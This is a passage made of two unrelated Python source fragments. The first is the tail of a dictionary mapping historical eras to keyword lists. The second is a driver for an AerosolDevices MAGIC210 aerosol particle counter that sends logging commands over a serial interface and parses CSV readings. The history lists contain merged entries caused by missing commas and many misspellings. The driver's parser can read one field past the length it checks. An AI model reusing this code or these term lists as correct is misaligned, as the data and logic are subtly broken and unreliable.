"Great Occidental Schism",
"Schism of 1378",
"Catholic Church",
"Roman Catholic Church",
"interstate conflict",
"civil strife",
"peasant revolts",
"revolt",
"revolts"
],
"Kediri Empire": [
"Kediri Empire",
"Kediri Kingdom",
"Kadiri",
"Kediri",
"Panjalu",
"Hindu Javanese Kingdom",
"Kakawin Bharatayuddha",
"Gatotkacasraya",
"Mpu Dharmaja",
"Mpu Panuluh",
"Mpu Sedah",
"Smaradhana",
"Javanese litterature",
"Airlangga",
"Janggala",
"Kertajaya",
"Ken Arok of Tumapel",
"Kediri kings",
"Majapahit period"
],
"Ottoman Empire": [
"Ottoman Empire",
"Ottoman caliphate",
"Ottomans",
"Ottoman",
"caliphate",
"Turkoman tribal leader Osman I",
"tribal leader Osman I",
"Osman I",
"Turkic origin",
"turkic",
"Persianised",
"Persianate society",
"conquest of the Balkans",
"Balkans",
"Ottoman beylik",
"Anatolian beyliks",
"1453 conquest of Constantinople",
"conquest of Constantinople",
"Constantinople",
"Mehmed the Conqueror",
"Mehmed II",
"Suleiman the Magnificent",
"Suleiman I",
"Kanuni sultan suleyman",
"Ottoman military system",
"Habsburg",
"Habsburg Monarchy",
"Russian empire",
"Imperial Germany",
"Imperial State of Germany",
"German empire",
"Armenians Genocide",
"Assyrians Genocide",
"Sayfo",
"Seyfo",
"Greeks Genocide",
"Pontic Genocide",
"Arab Revolt",
"Great Arab Revolt"
"World War I",
"Great War",
"First World War",
"Central Powers",
"Central Empires",
"Quadruple Alliance",
"partition of the Ottoman Empire",
"Ottoman Empire partitioning",
"Sykes Picot Agreement",
"Abolition of the Ottoman monarchy",
"Turkish War of Independance",
"Mustafa Kemal Atatürk",
"Kemal Atatürk",
"aftermath of World War I",
"World War I defeat"
],
"Renaissance": [
"Renaissance",
"Europe",
"Modernity",
"Crisis of the Late Middle Ages",
"social change",
"early modern period",
"humanism",
"Roman Humanitas",
"classical Greek philosophy",
"Protagoras",
"Renaissance art",
"oil painting",
"Dante",
"paintings of Giotto",
"Giotto",
"Giotto di Bondone",
"poetry of Dante",
"Dante Alighieri",
"Renaissance architecture",
"linear perspective",
"natural reality",
"educational reform",
"Renaissance politics",
"customs",
"conventions of diplomacy",
"Renaissance science",
"observation",
"inductive reasoning",
"Renaissance literature",
"Latin",
"vernacular literature",
"Renaissance man",
"social upheaval",
"political upheaval",
"Petrarch",
"polymaths",
"da Vinci",
"Leonardo da Vinci",
"Michelangelo",
"Florence",
"Italy",
"Medici",
"Greek scholars",
"migration",
"Fall of Constantinople",
"Timurid Renaissance",
"Renaissance papacy",
"Italian Renaissance",
"cultural advance"
],
"Age of Discovery": [
"Age of Discovery",
"Age of Exploration",
"overseas exploration",
"discovery of the Americas",
"beginning of globalization",
"globalization",
"colonialism",
"mercantilism",
"invaders",
"unknown continents",
"unknown",
"Portuguese discoveries",
"Atlantic archipelagos",
"Madeira",
"Azores",
"Coast of Africa",
"Africa",
"Portuguese discovery of the sea route to India",
"sea route to India",
"Crown of Castile",
"trans-Atlantic voyages",
"Christopher Columbus",
"Columbus",
"Magellan-Elcano circumnavigation",
"circumnavigation",
"Ferdinand Magellan",
"Magellan",
"Juan Sebastián Elcano",
"Elcano",
"Enrique of Malacca",
"Malacca",
"naval expedition",
"naval expeditions",
"land expeditions",
"land expedition",
"expedition",
"expeditions",
"polar explorations",
"polar exploration",
"global trade",
"international trade",
"colonial empire",
"Old World",
"New World",
"Columbian exchange",
"Columbian interchange",
"slaves",
"slavery",
"slave",
"enslavement",
"communicable disease",
"infectious disease",
"transmissible disease",
"Major explorations",
"European explorations",
"mapping of the world",
"world cartography",
"new worldview",
"distant civilization",
"exploitation",
"military conquest",
"economic dominance",
"native population",
"native population",
"native",
"natives",
"missionary",
"Christian mission",
"Christianity"
],
"Sengoku Period": [
"Sengoku Period",
"civil war",
"social upheaval",
"political intrigue",
"Onin War",
"feudal system",
"feudalism",
"collapse of feudal system",
"Ashikaga Shogunate",
"Muromachi Shogunate",
"samurai warlords",
"samurai",
"samurai rule",
"Ikko-ikki",
"Nanban trade",
"Nanban trade period",
"tributary state of China",
"Cefeng system",
"Oda Nobunaga",
"Great unifier",
"Ishiyama Hongan-ji War",
"Honnō-ji Incident",
"Toyotomi Hideyoshi",
"Japanese invasions of Korea",
"Japanese invasions",
"Tokugawa Ieyasu",
"Toyotomi Hideyori",
"Battle of Sekigahara",
"Tokugawa Shogunate",
"Toyotomi loyalists",
"Siege of Osaka"
],
"Aztec Empire": [
"Aztec Empire",
"Nahua altepetl",
"Nahua altepetl city-states",
"Mexico-Tenochtitlan",
"Texcoco",
"Tlacopan",
"Valley of Mexico",
"Spanish conquistadores",
"Hernán Cortés",
"civil war",
"Azcapotzalco",
"Tenochtitlan",
"conquest",
"Mesoamerica",
"Xoconochco province",
"hegemonic",
"indirect",
"semi-annual tribute",
"tribute",
"local autonomy",
"military forces",
"polytheistic",
"deities",
"Huitzilopochtli",
"imperial cult",
"local pantheons"
],
"Inca Empire": [
"Inca Empire",
"Incan Empire",
"Inka Empire",
"Inca emperor",
"Topa Inca Yupanqui",
"Tupac Inca Yupanqui",
"pre-Columbian America",
"Cusco",
"Inca civilization",
"Western South America",
"Andean Mountains",
"Quechua",
"Huacas",
"sun worship",
"Inti",
"sun god",
"Pachamama",
"Sapa Inca"
],
"Tudor Period": [
"Tudor Period",
"Elizabeth Period",
"House of Tudor",
"Henry VII",
"Henry VIII",
"Edward VI",
"Mary I",
"Elizabeth I"
],
"Reformation": [
"Reformation",
"Protestant Reformation",
"European Reformation",
"Western Christianity",
"Catholic Church",
"Roman Catholic Church",
"papal authority",
"errors",
"abuses",
"discrepancies",
"Protestantism",
"schism",
"split from Roman Catholic Church",
"religious split",
"Holy Roman Empire",
"Edict of Worms",
"Ninety-five Theses",
"Martin Luther",
"Counter-Reformation",
"Catholic Reformation",
"Catholic Revival"
],
"Mughal Empire": [
"Mughal Empire",
"Mughal imperial structure",
"Mogul Empire",
"Gurkani",
"Babur",
"tribal chief",
"chieftain",
"Safavid Empire",
"Safavid",
"Ottoman empire",
"Sultan of Delhi",
"Ibrahim Lodhi",
"First Battle of Panipat",
"Akbar",
"Aurangzeb",
"Mughal emperor",
"Agra Fort",
"Fatehpur Sikri",
"Red Fort",
"Humayun's Tomb",
"Lahore Fort",
"Shalamar Gardens",
"Taj Mahal",
"jewel of Muslim art",
"Shah Jahan"
],
"Elizabethan Age": [
"Elizabethan Age",
"Elizabethan Era",
"Tudor Period",
"Queen Elizabeth I",
"Queen Elizabeth I of England",
"Golden Age",
"English Renaissance",
"William Shakespeare",
"Shakespeare",
"Protestant Reformation",
"Reformation",
"English Reformation",
"Elizabethan Religious Settlement",
"Anglo-Spanish War",
"Philip II of Spain",
"Spanish Armada",
"English Armada",
"Drake-Norris Expedition",
"Drake-Norris Expedition of 1589",
"1589 Drake-Norris Expedition",
"Treaty of London",
"Mary I of Scotland",
"Mary Stuart",
"Mary, Queen of Scots",
"Mary, Queen of Scotland",
"Rising of the North",
"Babington Plot",
"James I",
"James I of England",
"James VI of Scotland",
"Auld Alliance",
"John Knox",
"Mary of Guise",
"Mary of Loraine",
"Catholicism",
"ProtestantismTreaty of Edinburgh",
"1560 Treaty of Edinburgh",
"Treaty of Edinburgh of 1560"
],
"Stuart Period": [
"Stuart Period",
"House of Stuart",
"Grand Remonstrance",
"Declaration of Breda",
"Treaty of Ryswick",
"Anglo-Dutch War",
"Act of Settlement",
"Great Fire of London",
"First Anglo-Dutch War",
"personal rule",
"Gunpowder Plot",
"Short Parliament",
"Long Parliament",
"Second English Civil War",
"Glorious Revolution",
"Monmouth Rebellion",
"Titus Oates",
"Bloody Assizes",
"Battle of Sedgemoo",
"English Act of Settlement",
"War of the Spanish Succession",
"English Civil War",
"Immortal Seven",
"Battle of the Boyne",
"Revolution of 1688",
"Rye House Plot",
"Third Anglo-Dutch War",
"Second Anglo-Dutch War",
"Treaty of Utrecht",
"Act of Union",
"Pacification of Berwick",
"Nine Years' War",
"Exclusion Crisis",
"Act of Uniformity",
"Restoration",
"Book of Common Prayer",
"United Kingdom",
"Great Britain",
"George Villiers",
"Queen Anne",
"James I",
"James I of England",
"James VI of Scotland",
"James II",
"Charles II",
"James VI",
"Charles I",
"Catherine of Braganza",
"William Laud",
"Richard Cromwell",
"William of Orange",
"Thomas Wentworth",
"Mary II",
"William III",
"Berwick",
"Aphra Behn",
"Mary of Modena",
"James Francis Edward Stuart",
"JacobitesJacobean Era",
"Caroline Era",
"Whigs"
],
"Tokugawa Shogunate": [
"Tokugawa Shogunate",
"Tokugawa PeriodEdo Period",
"Edo Bakufu",
"Tokugawa Leyasu",
"Battle of Sekigahara",
"Shogun",
"Tokugawa clan",
"Edo Castle",
"daimyo",
"samurai",
"Edo Society",
"Tokugawa class system",
"isolationist policies",
"Sakoku",
"feudal system",
"han",
"ukiyo culture",
"urbanization",
"Bakumatsu",
"Imperial Court",
"Imperial Court in Kyoto",
"Meiji Restoration",
"Honorable Restoration",
"Revolution Reform",
"Meiji Renovation",
"Renewal"
],
"Age of Enlightenment": [
"Age of Enlightement",
"Age of Reason",
"The Englightment",
"Enlightement principles",
"Scientific Revolution",
"Knowledge",
"Development of ideals",
"philosophers",
"Philosophy",
"philosophes",
"Western philosophy",
"Eastern philosophy",
"Religious philosophy",
"tolerance",
"civil liberties",
"civil liberty",
"scientific method",
"reductionism",
"intellectualism",
"reason",
"deist movement",
"deism",
"skepticism",
"Enlightenment political thought",
"democratic values",
"liberal democracies",
"democracy",
"social contract",
"social contract theory",
"intellectual culture",
"enlightement thinkers",
"thinkers",
"classical liberalism",
"liberal thought",
"liberal",
"equality",
"equality before law",
"natural rights",
"rights",
"general will",
"Life, Liberty and Property",
"capitalism",
"consent of the governed",
"Declaration of the Rights of Man and of the Citizen",
"John Locke",
"Locke",
"Jean-Jacques Rousseau",
"Rousseau",
"Voltaire",
"Francois-Marie Arouet",
"Thomas Hobbes",
"Leviathan",
"Two Treatises of Government",
"Discourse on Inequality",
"inequality",
"enlightened absolutism",
"Seven Years' War",
"War of the Austrian Succession",
"Diplomatic Revolution",
"Diplomatic Revolution of 1756",
"1756 Diplomatic Revolution",
"American Revolutionary War",
"American War of Independence",
"Women's March on Versailles",
"October March",
"October Days",
"March on Versailles",
"1789 March on Versailles",
"1789 October March",
"abolition of feudalism",
"jacobins",
"girondins",
"montagnards",
"French Revolution",
"1789 French Revolution",
"French Revolution of 1789",
"political revolution",
"Attack on Bastille",
"Bastille Day",
"Storming on Bastille",
"sans-culottes",
"French Revolutionary wars",
"Insurection of 10 August 1792",
"1792 insurection",
"1793 insurection",
"Robespierre",
"Maximilien Robespierre",
"Reign of Terror",
"The Terror",
"Fall of Maximilien Robespierre",
"Fall of Robespierre",
"Coup d'Etat of 9 Thermidor",
"Thermidorian Reaction",
"Coup d'Etat",
"Battle of Valmy"
],
"Industrial Revolution": [
"Industrial Revolution",
"First Industrial Revolution",
"Second Industrial Revolution",
"Techonlogical Revolution",
"factories",
"factors of production",
"production",
"factory",
"mechanization",
"industrialization",
"mass-production",
"assembly lines",
"Bessemer process",
"steel making process",
"invention",
"innovation",
"Transportation",
"Agriculture",
"Steam Power",
"Textile Industry",
"textile manufacturing",
"Mining Industry",
"Iron Industry",
"machine",
"Labor conditions",
"technological developments",
"social change"
],
"Georgian Period": [
"Georgian Era",
"Georgian Period",
"Augustan litterature",
"Georgian Architecture",
"George I",
"George II",
"George III",
"George IV",
"William IV"
],
"Victorian Age": [
"Victorian era",
"Victorian age",
"Representation of the People Act 1832",
"Crimean War",
"British Empire",
"Belle Epoque",
"Great Game",
"Great Hunger",
"Great FamineReform Act 1832",
"Pax Britanica",
"Queen Victoria"
],
"Edwardian Period": [
"Edwardian era",
"Edwardian Period",
"Liberals",
"fashion",
"United Kingdom general election",
"Liberal welfare reforms",
"New Poor law",
"1834 Poor Law",
"suffragette",
"woman's suffrage",
"George V",
"Edward VII"
],
"World War One": [
"World War One",
"WWI",
"WW1",
"Triple Alliance",
"Western Front",
"Alpine Front",
"Triple Entente",
"Eastern Front",
"tranchee",
"Verdun",
"Battle of Verdun",
"First Battle of the Marne",
"Second Battle of the Marne",
"Battle of Somme",
"Second Battle of SommeBalkans Theater",
"Great October Socialist Revolution",
"Bolshevik Revolution",
"October Uprising",
"Red October",
"October Revolution",
"Bolshevik Party",
"Bolshevik",
"Treaty of Brest-Litvosk",
"Armistice of Compiegne",
"Paris Peace Conference",
"Armistice of 11 November 1918",
"Versailles Treaty"
],
"Inter War Years": [
"Interwar period",
"interwar",
"between the wars",
"roaring twenties",
"Golden Twenties",
"Women's suffrage",
"Great Depression",
"Annees Folles",
"Weimar Republic",
"German Reich",
"fascism",
"USSR",
"Russian Civil War",
"Great Purge",
"Great Terror",
"Year 1937",
"Gulag",
"forced-labor",
"forced labor",
"labor camp",
"POW",
"prisoner of warWashington Naval Treaty",
"Five-Power Treaty",
"Spanish Civil War",
"Chinese Civil War",
"Francisco Franco",
"Franco",
"Joseph Stalin",
"Stalin",
"Lenin",
"Vladimir ILyich Ulyanov"
],
"World War Two": [
"Second World War",
"World War Two",
"WW2",
"World War II",
"WWII",
"Western Front",
"Allies",
"Allies powers",
"Allied Invasion",
"Axis",
"Axis powers",
"Eastern Front",
"Great Patriotic War",
"German Army",
"German Reich",
"Third Reich",
"Nazi Germany",
"Nazi Party",
"Nazi",
"Wehrmacht",
"Gestapo",
"SS",
"Schutzstaffel",
"Wannsee Conference",
"fascism",
"Nazi boycott",
"1933 Enabling Act",
"Enabling Act of 1933",
"Enabling Act",
"Kristallnacht",
"November Pogrom",
"Night of Broken Glass",
"IG Farben",
"Final Solution to the Jewish Question",
"Final Solution",
"Genocide",
"racial segregation",
"Jews",
"jewish",
"Holocaust",
"Shoah",
"The Shoah",
"work camp",
"forced labor",
"forced-labor",
"forced-labor camp",
"concentration camp",
"satellite camp",
"subcamp",
"deportation",
"deported",
"Zyklon B",
"ghettos",
"kapo",
"gas chambers",
"death squads",
"death marches",
"extermination camp",
"Auschwitz",
"Mauthausen",
"Neuengamme",
"Sachsenhausen",
"Sachsenhausen-Oranienburg",
"Monowitz",
"Dachau",
"Gross-Rosen",
"Buchenwald",
"Ravensbruck",
"Natzweiler",
"Natzweiler-Struthof",
"Flossenburg",
"Aktion 14f13",
"Action 14f13",
"Nuremberg",
"Nuremberg Trials",
"Gulag",
"Molotov-Ribbentrop Pact",
"warfare",
"Blitz",
"conflict",
"bombing",
"air warfare",
"terror bombing",
"startegic bombic",
"Pearl Harbor",
"Attack of Pearl Harbor",
"Attack on Pearl Harbor",
"Hiroshima",
"Nagasaki",
"Operation Downfall",
"Battle of MoscowBattle of Kursk",
"Normandy landings",
"Operation Neptune",
"Operation Overlord",
"Western Allied Invasion",
"Dunkirk",
"Battle of Dunkirk",
"Battle of Guadalcanal",
"Guadalcanal campaign",
"Operation Watchtower",
"Battle of Britain",
"Battle of Crete",
"Operation Market Garden",
"Battle of Monte Cassino",
"Battle of Okinawa",
"Balkans Campaign",
"Battle of Hurtgen Forest",
"Battle of the Atlantic",
"Battle of Leyte Gulf",
"Operation Barbarossa",
"Stalingrad",
"Battle of Stalingrad",
"Battle of Philippine Sea",
"Battle of Midway",
"Battle of Anzio",
"Japanese Invasion of Malaya",
"Battle of the Coral Sea",
"Battle of Bulge",
"Operation Himmler",
"invasion",
"Invasion of Poland",
"Battle of France",
"collaborator",
"occupation",
"Gau Baden",
"occupation of Baltic states",
"German-occupied France",
"Free France",
"Fall of France",
"Proclamation Defining Terms of Japanese Surrender",
"Berlin Strategic Offensive Operation",
"Anschluss",
"Anschluss Osterreichs",
"November Pogroms",
"Western Allied Invasion of Germany",
"Battle of Berlin",
"Fall of Berlin",
"prisonners of war",
"POW",
"Victory Day",
"V-day",
"Potsdam Declaration",
"Munich Agreement",
"Munich Betrayal",
"Charles de Gaulle",
"de Gaulle",
"Petain",
"Philippe Petain",
"Marshal Petain",
"Churchill",
"Winston Churchill",
"Franklin D. Roosevelt",
"Franklin Roosevelt",
"Roosevelt",
"Benito Mussolini",
"Mussolini",
"Joseph Stalin",
"Stalin",
"Adolf Hitler",
"Hitler",
"Himmler",
"Heinrich Himmler",
"Josef Mengele",
"Mengele",
"Chiang Kai-shek",
"Kai-shek",
"Hirohito"
],
"Atomic Age": [
"Atomic Age",
"Atomic Era",
"nuclear warfare",
"nuclear arms race",
"Nevada Test Site",
"trinity test",
"three mile island accident",
"the Gadget",
"Hiroshima",
"Nagasaki",
"nuclear meltdownChernobyl",
"Chernobyl disaster",
"United States Atomic energy commission",
"Atomic Energy Commission",
"AEC",
"dirty bombs",
"Tohoku earthquake",
"Fukushima",
"Fukushima Daiichi",
"Fukushima Daiichi nuclear disaster",
"Fukushima I Nuclear Power Plant",
"GPM",
"anti-nuclear movement",
"Great Peace March for Global Nuclear Disarmament",
"START I",
"START I treaty",
"New START treaty",
"New START"
],
"Cold War Period": [
"Cold War",
"Cold War period",
"Soviet Union",
"USSR",
"Communist",
"Communist Party",
"Communist Bloc",
"Socialist Bloc",
"Soviet Bloc",
"Eastern Bloc",
"Russia",
"Berlin Crisis of 1961",
"United States",
"Western Bloc",
"Capitalist Bloc",
"Democratic",
"Liberal Democratic",
"Iron Curtain",
"NATO",
"OTAN",
"Revolutions of 1989",
"Fall of Communism",
"Fall of Nations",
"Autumn of Nations",
"Berlin Wall",
"Fall of Berlin Wall",
"Dissolution of Soviet Union",
"Strategic Arms Limitation Talks",
"SALT I",
"SALT II",
"August Coup",
"1991 August Coup",
"August Coup of 1991",
"Mikhail Gorbachev",
"Glasnost Meeting",
"Glasnost Rally",
"Glasnost",
"perestroika",
"Caribbean Crisis",
"Cuban Missile Crisis",
"October Crisis of 1962",
"Missile Scare",
"Berlin Blockade",
"Black Sea Bumping incident",
"Bezzavetny",
"USS Yorktown",
"Korean War",
"People's Republic of China",
"Sino-Soviet split",
"Chinese Civil War",
"Soviet-Afghan War",
"Truman",
"Harry Truman",
"Harry S. Truman",
"Ronald Reagan",
"Reagan",
"Reagan doctrine",
"Truman Doctrine",
"North Atlantic Treaty",
"Washington Treaty",
"Trente Glorieuses",
"Era of Stagnation",
"Brezhnevian Stagnation",
"Stagnation Period",
"Warsaw Pact",
"Operation Danube",
"Prague Spring",
"Decolonization",
"Decolonization of Africa",
"Vietnam war",
"Second Indochina War",
"Resistance War Against America",
"American War",
"Suez Crisis",
"Second Arab-Israeli War",
"tripartite aggression",
"Sinai war"
],
"Space Age": [
"Space Age",
"Space Race",
"Space Technology",
"SpaceX",
"International Space station",
"ISS",
"Ansari X Prize",
"Sputnik 1",
"NASA",
"Apollo programApollo 11",
"Space Shuttle Challenger",
"Space Shuttle Challenger disaster",
"Challenger disaster",
"Challenger",
"Space Exploration",
"Space Ship One",
"Space Shuttle",
"private spaceflight"
],
"Age of Information": [
"Age of Information",
"Computer Age",
"New Media Age",
"Digital Age",
"Information Age",
"United Nations Public Administration Network",
"computers",
"innovations",
"data"
]}
return history_terminology
|
from datetime import datetime
import pytz
from daq.instrument.instrument import Instrument
from shared.data.message import Message
from shared.data.status import Status
import asyncio
from shared.utilities.util import time_to_next, string_to_dt, dt_to_string
from daq.interface.interface import Interface
class ADInstrument(Instrument):
INSTANTIABLE = False
def __init__(self, config, **kwargs):
super(ADInstrument, self).__init__(config, **kwargs)
self.mfg = "AerosolDevices"
def setup(self):
super().setup()
# TODO: add properties get/set to interface for
# things like readmethod
class MAGIC210(ADInstrument):
INSTANTIABLE = True
def __init__(self, config, **kwargs):
super(MAGIC210, self).__init__(config, **kwargs)
self.name = "MAGIC210"
self.model = "210"
self.tag_list = [
"concentration",
"aerosol",
"physics",
]
self.iface_meas_map = None
self.polling_task = None
# override how often metadata is sent
self.include_metadata_interval = 300
# this instrument appears to work with readline
# self.iface_options = {
# 'read_method': 'readuntil',
# 'read_terminator': '\r',
# }
self.setup()
# def get_datafile_config(self):
# config = super().get_datafile_config()
# config["save_interval"] = 0
# return config
def setup(self):
super().setup()
# default coms:
# Baud rate: 115200
# Bits: 8
# Stop bits: 1
# Parity: none
# Flow Control: none
self.iface = None
if self.iface_components["default"]:
if_id = self.iface_components["default"]
self.iface = self.iface_map[if_id]
else:
self.iface = next(iter(self.iface_map.values()))
self.is_polled = False
# self.poll_rate = 2 # every second
self.parse_map = dict()
self.data_record_template = dict()
definition = self.get_definition_instance()
meas_config = definition["DEFINITION"]["measurement_config"]
for msetsname, mset in meas_config.items():
# self.data_record_template[msetname] = dict()
for name, meas in mset.items():
if "parse_label" in meas:
parse_label = meas["parse_label"]
self.parse_map[parse_label] = name
# self.data_record_template[msetsname][name] = None
self.data_record_template[name] = {"VALUE": None}
self.status["ready_to_run"] = True
self.status2.set_run_status(Status.READY_TO_RUN)
self.enable()
print("done")
async def shutdown(self):
self.stop()
self.disable()
await self.deregister_from_UI()
await super().shutdown()
def enable(self):
super().enable()
asyncio.create_task(self.stop_logging())
# # if self.is_polled:
# self.polling_task = asyncio.create_task(self.poll_loop())
# asyncio.create_task(self.toggle_mcpc_power(power=0))
def disable(self):
# asyncio.create_task(self.toggle_mcpc_power(power=0))
# if self.polling_task:
# self.polling_task.cancel()
super().disable()
def start(self, cmd=None):
super().start()
asyncio.create_task(self.start_logging())
async def start_logging(self):
if self.iface:
# if self.iface_components["default"]:
# if_id = self.iface_components["default"]
# self.current_read_cnt = 0
# await asyncio.sleep(0.1)
# Start logging
cmd = "Log,1\n"
msg = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
subject="SEND",
body=cmd,
)
# print(f'msg: {msg}')
# await self.iface.message_from_parent(msg)
# await self.iface_map[if_id].message_from_parent(msg)
await self.iface.message_from_parent(msg)
# TODO: Send start command:
# Log,1 <- Starts sending data every second
async def stop_logging(self):
if self.iface:
# if self.iface_components["default"]:
# if_id = self.iface_components["default"]
# self.current_read_cnt = 0
# await asyncio.sleep(0.1)
# Start logging
cmd = "Log,0\n"
msg = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
subject="SEND",
body=cmd,
)
# print(f'msg: {msg}')
# await self.iface.message_from_parent(msg)
# await self.iface_map[if_id].message_from_parent(msg)
await self.iface.message_from_parent(msg)
def stop(self, cmd=None):
# TODO: Send start command:
# Log,0 <- Stops sending data
asyncio.create_task(self.stop_logging())
super().stop()
async def handle(self, msg, type=None):
# print(f'%%%%% MAGIC210.handle: {msg.to_json()}')
if type == "FromChild" and msg.type == Interface.class_type:
dt = self.parse(msg)
# print(f'dt = {dt}')
if dt:
entry = self.get_data_entry(dt)
data = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
)
data.update(subject="DATA", body=entry)
await self.message_to_ui(data)
await super().handle(msg, type)
async def handle_control_action(self, control, value):
if control and value is not None:
if control == "start_stop":
await super(MAGIC210, self).handle_control_action(control, value)
def parse(self, msg):
# print(f'parse: {msg}')
# entry = dict()
# entry['METADATA'] = self.get_metadata()
# data = dict()
# data['DATETIME'] = msg.body['DATETIME']
dt = msg.body["DATETIME"]
if dt:
line = msg.body["DATA"].strip()
params = line.split(",")
if len(params) < 23:
return None
labels = [
"magic_datetime",
"concentration", # 1
"dew_pt_inlet",
"temperature_inlet",
"rh_inlet",
"temperature_conditioner",
"temperature_initiator",
"temperature_moderator",
"temperature_optics",
"temperature_heatsink",
"temperature_pcb",
"temperature_cabinet",
"ps_voltage",
"diff_pressure",
"pressure",
"sample_flow",
"interval_time", # 16
"live_time",
"dead_time",
"raw_counts_lower",
"raw_counts_higher",
"error",
"error_string",
"serial_number",
]
# TODO parse magic_dt
dts = params[0]
try:
# dt = datetime.strptime(magic_dt,'%Y/%m/%d %H:%M:%S')
# pytz.utc.localize(dt)
tmp_dt = string_to_dt(dts, format='%Y/%m/%d %H:%M:%S')
magic_dt = dt_to_string(tmp_dt)
except ValueError:
magic_dt = ""
self.update_data_record(dt, {"magic_datetime": magic_dt})
for i in range(1, 16):
val = float(params[i])
self.update_data_record(dt, {labels[i]: round(val, 3)})
# interval_time
val = int(params[16])
self.update_data_record(dt, {labels[16]: val})
# live/dead times
val = int(params[17])
self.update_data_record(dt, {labels[17]: val})
val = int(params[18])
self.update_data_record(dt, {labels[18]: val})
# raw_counts
val = int(params[19])
self.update_data_record(dt, {labels[19]: val})
val = int(params[20])
self.update_data_record(dt, {labels[20]: val})
# error
val = int(params[21])
self.update_data_record(dt, {labels[21]: val})
# error_string
self.update_data_record(dt, {labels[22]: params[22]})
# s/n
val = int(params[23])
self.update_data_record(dt, {labels[23]: val})
return dt
def get_definition_instance(self):
# make sure it's good for json
# def_json = json.dumps(DummyInstrument.get_definition())
# print(f'def_json: {def_json}')
# return json.loads(def_json)
return MAGIC210.get_definition()
def get_definition():
# TODO: come up with static definition method
definition = dict()
definition["module"] = MAGIC210.__module__
definition["name"] = MAGIC210.__name__
definition["mfg"] = "AerosolDevices"
definition["model"] = "210"
definition["type"] = "ParticleConcentration"
definition["tags"] = [
"concentration",
"particle",
"aerosol",
"physics",
"aerosoldevices",
"ad",
]
measurement_config = dict()
# array for plot conifg
y_data = []
# TODO: add interface entry for each measurement
primary_meas = dict()
primary_meas["concentration"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "cm-3", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "conc",
"parse_label": "conc",
"control": None,
}
y_data.append("concentration")
process_meas = dict()
process_meas["dew_pt_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dewpt_in",
"control": None,
}
y_data.append("dew_pt_inlet")
process_meas["temperature_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_in",
"control": None,
}
y_data.append("temperature_inlet")
process_meas["rh_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "%", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "rh_in",
"control": None,
}
y_data.append("rh_inlet")
process_meas["temperature_conditioner"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_cond",
"control": None,
}
y_data.append("temperature_conditioner")
process_meas["temperature_initiator"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_ini",
"control": None,
}
y_data.append("temperature_initiator")
process_meas["temperature_moderator"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_mod",
"control": None,
}
y_data.append("temperature_moderator")
process_meas["temperature_optics"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_opt",
"control": None,
}
y_data.append("temperature_optics")
process_meas["temperature_heatsink"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_hsk",
"control": None,
}
y_data.append("temperature_heatsink")
process_meas["temperature_pcb"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_pcb",
"control": None,
}
y_data.append("temperature_pcb")
process_meas["temperature_cabinet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_cab",
"control": None,
}
y_data.append("temperature_cabinet")
process_meas["ps_voltage"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "volts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "ps_v",
"control": None,
}
y_data.append("ps_voltage")
process_meas["diff_pressure"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "mb", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dpress",
"control": None,
}
y_data.append("diff_pressure")
process_meas["pressure"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "mb", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "press",
"control": None,
}
y_data.append("pressure")
process_meas["sample_flow"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "cm3 min-1", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "samp_flow",
"control": None,
}
y_data.append("sample_flow")
